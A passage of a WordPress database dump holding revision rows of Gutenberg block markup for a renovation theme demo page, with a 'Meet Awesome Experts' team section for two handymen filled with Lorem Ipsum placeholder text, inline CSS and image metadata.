.skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-ae062272-7a0d-44cf-80b7-b382aed119bf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">120</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Recent Works','','inherit','closed','closed','','166-revision-v1','','','2021-05-27 05:16:14','2021-05-27 05:16:14','',166,'https://cteisys.com/?p=341',0,'revision','',0),(170,1,'2021-05-27 05:17:13','2021-05-27 05:17:13','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ea83512c-9e0a-4c79-a9f2-27978cde243b\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":0,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-team-page\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-team-page skt-blocks-block-section-outer-wrap block-ea83512c-9e0a-4c79-a9f2-27978cde243b background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 0); }\n</style><style type=\"text/css\"> .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ea83512c-9e0a-4c79-a9f2-27978cde243b .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ea83512c-9e0a-4c79-a9f2-27978cde243b.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 0);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"bd80dab3-ab7e-405a-9093-ae70e5c93624\",\"showSeparator\":false,\"subheadSpacing\":45,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n margin-bottom: 45px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-bd80dab3-ab7e-405a-9093-ae70e5c93624 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-bd80dab3-ab7e-405a-9093-ae70e5c93624\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"}],\"gutter\":\"small\",\"designationColor\":\"#494848\",\"socialIconColor\":\"#000000\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"descriptionFontWeight\":\"400\",\"descriptionLineHeight\":2,\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"descriptionFontFamily\":\"Poppins\",\"titleFontSize\":20,\"descriptionFontSize\":17,\"imageMarginTop\":30,\"imageMarginBottom\":20,\"iconSize\":\"1.5em\",\"titleSpacing\":0,\"designationSpacing\":15,\"descriptionSpacing\":40,\"socialIconSpacing\":10,\"imageWidth\":260,\"borderColor\":\"#000000\",\"borderWidth\":0,\"borderRadius\":0,\"padding\":30,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"email\":true,\"youtube\":true,\"pinterest\":true} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-2-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-color:#000000;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-color:#000000;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Maria Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-instagram\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li></ul></div></div></div></div>\n<!-- /wp:skt-blocks/team -->\n\n<!-- wp:spacer {\"height\":20} -->\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":32,\"teamImgURL\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"10aa7ca43c\",\"delete\":\"c163db9d18\",\"edit\":\"ba86ecc494\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"},{\"teamName\":\"Maria Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"u003cpu003eLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.u003c/pu003e\",\"teamImgId\":31,\"teamImgURL\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"831de6a10a\",\"delete\":\"cb920ef057\",\"edit\":\"502119efcc\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"twitterUrl\":\"\",\"emailAddress\":\"\",\"facebookUrl\":\"\",\"instagramUrl\":\"\",\"youtubeUrl\":\"\",\"pinterestUrl\":\"\",\"linkedinUrl\":\"\"}],\"gutter\":\"small\",\"designationColor\":\"#494848\",\"socialIconColor\":\"#000000\",\"titleColor\":\"#393939\",\"titleFontWeight\":\"600\",\"designationFontWeight\":\"400\",\"descriptionFontWeight\":\"400\",\"descriptionLineHeight\":2,\"imageSize\":\"large\",\"titleFontFamily\":\"Poppins\",\"designationFontFamily\":\"Poppins\",\"descriptionFontFamily\":\"Poppins\",\"titleFontSize\":20,\"descriptionFontSize\":17,\"imageMarginTop\":30,\"imageMarginBottom\":20,\"iconSize\":\"1.5em\",\"titleSpacing\":0,\"designationSpacing\":15,\"descriptionSpacing\":40,\"socialIconSpacing\":10,\"imageWidth\":260,\"borderWidth\":0,\"borderRadius\":0,\"padding\":30,\"imageShape\":\"square\",\"opacity\":0,\"backgroundPosition\":\"left top\",\"email\":true,\"youtube\":true,\"pinterest\":true} -->\n<div class=\"wp-block-skt-blocks-team-wrapper has-columns has-2-columns has-responsive-columns has-small-gutter\"><div class=\"skt-blocks-font-size-large skt-blocks-block-team image-shape-square\" style=\"background-image:linear-gradient(100deg,rgba(255, 255, 255, 0)0% ,rgba(255, 255, 255, 0)100% );background-size:cover;background-repeat:no-repeat;background-position:left top;background-attachment:scroll;border-width:0;border-radius:0;padding:30px;text-align:center;box-shadow:20px 20px 50px 20px undefined \"><div class=\"skt-blocks-team-avatar-wrapper\" style=\"text-align:-webkit-center\"><figure class=\"skt-blocks-team-avatar\" style=\"width:260px;margin-top:30px;margin-bottom:20px;text-align:justify\"><img class=\"skt-blocks-team-avatar-img\" src=\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\" alt=\"\"/></figure></div><div class=\"skt-blocks-team-content\"><h3 class=\"skt-blocks-team-name\" style=\"color:#393939;font-family:Poppins;font-size:20px;font-weight:600;margin-bottom:0\">Kevin Albert</h3><div class=\"skt-blocks-team-designation\" style=\"color:#494848;font-family:Poppins;font-size:15px;font-weight:400;margin-bottom:15px\"><p>Handyman</p></div><div class=\"skt-blocks-team-description\" style=\"font-family:Poppins;font-size:17px;font-weight:400;line-height:2;margin-bottom:40px\"><p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p></div><div class=\"skt-blocks-team-social-icons-wrapper\"><ul class=\"skt-blocks-team-social-icons\"><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-twitter\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-facebook\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons dashicons-linkedin\" style=\"color:#000000;font-size:1.5em;text-decoration:none;height:1.5em;width:1.5em\"></span></a></li><li style=\"margin-left:10px;margin-right:10px\"><a href=\"\"><span class=\"dashicons 